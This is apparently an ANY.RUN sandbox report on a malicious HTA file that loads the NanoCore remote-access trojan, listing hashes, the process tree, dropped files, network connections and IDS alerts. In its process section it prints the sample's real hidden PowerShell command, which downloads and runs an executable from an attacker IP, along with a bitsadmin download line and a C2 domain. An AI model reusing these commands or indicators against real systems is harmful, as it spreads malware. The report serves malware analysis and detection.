analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

jnn.hta

Full analysis: https://app.any.run/tasks/dcd85347-4731-4b1a-a04d-fded9aeda729
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 14, 2019, 11:25:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
autoit
rat
nanocore
Indicators:
MIME: text/html
File info: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5:

A6D6CDC59C6507424B2AEDEFF46AFD2B

SHA1:

3D9D1169A822D2C17BA8E8F1E42794246AEA8958

SHA256:

BD6B52E1365E898CF42A2AE281E897884C440BD33140A264F90E34D4AAE3330A

SSDEEP:

48:ZKpON1CTY1zH1aKL2slzhapoeddogoioFxBZoWk0uynk3nKpON1CTY1zH1aKL2s2:ZBvaY1zUMdzBZweoBvaY1zUMdzBZwjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • mdo.exe (PID: 4052)
      • Hmmmm.exe (PID: 2704)
      • mdo.exe (PID: 3708)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3040)
    • Downloads executable files from IP

      • powershell.exe (PID: 3040)
    • Uses BITADMIN.EXE for downloading application

      • mshta.exe (PID: 3500)
    • NanoCore was detected

      • RegSvcs.exe (PID: 3092)
    • Executes PowerShell scripts

      • mshta.exe (PID: 3500)
    • Changes the autorun value in the registry

      • mdo.exe (PID: 3708)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3040)
      • Hmmmm.exe (PID: 2704)
    • Drop AutoIt3 executable file

      • Hmmmm.exe (PID: 2704)
    • Creates files in the user directory

      • powershell.exe (PID: 3040)
      • RegSvcs.exe (PID: 3092)
      • powershell.exe (PID: 2920)
    • Application launched itself

      • mdo.exe (PID: 4052)
    • Connects to unusual port

      • RegSvcs.exe (PID: 3092)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • mdo.exe (PID: 4052)
      • Hmmmm.exe (PID: 2704)
    • Reads internet explorer settings

      • mshta.exe (PID: 3500)
    • Reads settings of System Certificates

      • chrome.exe (PID: 3440)
    • Application launched itself

      • chrome.exe (PID: 3440)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-8 encoded (100)

EXIF

HTML

ContentType: text/html; charset=utf-8
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
21
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start mshta.exe no specs bitsadmin.exe no specs powershell.exe hmmmm.exe mdo.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs mdo.exe #NANOCORE regsvcs.exe chrome.exe no specs bitsadmin.exe no specs powershell.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs explorer.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3500"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\jnn.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2600"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal Your Binded File Direct URL C:\Users\admin\AppData\Local\Temp\text.rtfC:\Windows\System32\bitsadmin.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2147942487
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3040"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://141.136.44.78/jnn/jnn.exe','C:\Users\admin\AppData\Local\Temp\Hmmmm.exe');Start-Process C:\Users\admin\AppData\Local\Temp\Hmmmm.exe;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2704"C:\Users\admin\AppData\Local\Temp\Hmmmm.exe" C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4052"C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe" seg=muu C:\Users\admin\AppData\Local\Temp\88127361\mdo.exeHmmmm.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script
Exit code:
0
Version:
3, 3, 14, 5
3440"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3400"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6fd100b0,0x6fd100c0,0x6fd100ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3300"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3468 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3668"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=66F4D65CDE3EF04B7011C34A3CDDFA53 --mojo-platform-channel-handle=992 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
3748"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --service-pipe-token=261CA67205A0B338F2C18D82FA22F4B0 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=261CA67205A0B338F2C18D82FA22F4B0 --renderer-client-id=5 --mojo-platform-channel-handle=1876 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
Total events
1 774
Read events
1 599
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
48
Text files
113
Unknown types
0

Dropped files

PID
Process
Filename
Type
3040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LBRI7FBWGNFUJXO42060.temp
MD5:
SHA256:
2704Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\jvk.mp3text
MD5:D9B7CC3F58DA6D96C3DBFB4008B26EB9
SHA256:29F324A7980E633B0052B5BDB634833CD094E5A631380FE6049FC6F6DAA7A48C
2704Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\dss.dattext
MD5:C488C0EEAA4A77679F10A662945E5E4E
SHA256:DB289B5F6CAD00BF4B05ED3BA50825AC178119EA0D5F9F58F7A22F1FF670ADDF
2704Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\lpr.mp4text
MD5:3576B5978B68394D98E25AFFD7225B83
SHA256:E182A17F5A6B486FF9410ECCCBF9685BC5C54CF2EC314AE255040DABCE04E895
3040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
2704Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\cll.ppttext
MD5:C3038BB5D678596A20440872BB278380
SHA256:70DCFC1D30A96AA81CA89C308A379A7458534B6C9CD469C8641E71842C188370
3040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1add42.TMPbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
2704Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\pou.icmtext
MD5:53CE9C11F69EDE839689A93EA34B9201
SHA256:3D08042DBB0A693DD4F838236E5D7F5E40F5667BA6B33ADCD605F26610817627
2704Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\bum.pdftext
MD5:FEAEEA7208F7A411E4CDC0E3286A11DB
SHA256:1DF03709F122F14E2606E94BCCB74B47C6C48A483C68A45ED446C06C0CA01965
2704Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\nbb.icmtext
MD5:9B65C9D1111C7E0640CE5900F01DBF05
SHA256:F4B0AE209225A3321ACD8B5303B09D8BA245AA4250620D1407356FAF82E6F800
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
29
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3040
powershell.exe
GET
200
141.136.44.78:80
http://141.136.44.78/jnn/jnn.exe
LT
executable
905 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3040
powershell.exe
141.136.44.78:80
Vardas.lt, Uab
LT
suspicious
3440
chrome.exe
172.217.23.170:443
safebrowsing.googleapis.com
Google Inc.
US
whitelisted
3440
chrome.exe
216.58.205.234:443
fonts.googleapis.com
Google Inc.
US
whitelisted
3440
chrome.exe
216.58.210.4:443
www.google.com
Google Inc.
US
whitelisted
3440
chrome.exe
216.58.207.46:443
apis.google.com
Google Inc.
US
whitelisted
3092
RegSvcs.exe
8.8.4.4:53
Google Inc.
US
whitelisted
3440
chrome.exe
216.58.208.35:443
www.gstatic.com
Google Inc.
US
whitelisted
2920
powershell.exe
141.136.44.78:80
Vardas.lt, Uab
LT
suspicious
3440
chrome.exe
172.217.23.131:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3092
RegSvcs.exe
8.8.8.8:53
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
www.gstatic.com
  • 216.58.208.35
whitelisted
clientservices.googleapis.com
  • 172.217.23.131
whitelisted
www.google.de
  • 216.58.207.67
whitelisted
safebrowsing.googleapis.com
  • 172.217.23.170
whitelisted
accounts.google.com
  • 172.217.18.13
shared
www.google.com
  • 216.58.210.4
whitelisted
ssl.gstatic.com
  • 216.58.207.35
whitelisted
www.google.lv
  • 172.217.16.131
whitelisted
kgentle777.hopto.org
unknown
fonts.googleapis.com
  • 216.58.205.234
whitelisted

Threats

PID
Process
Class
Message
3040
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3040
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3040
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3040
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3040
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3092
RegSvcs.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3092
RegSvcs.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
No debug info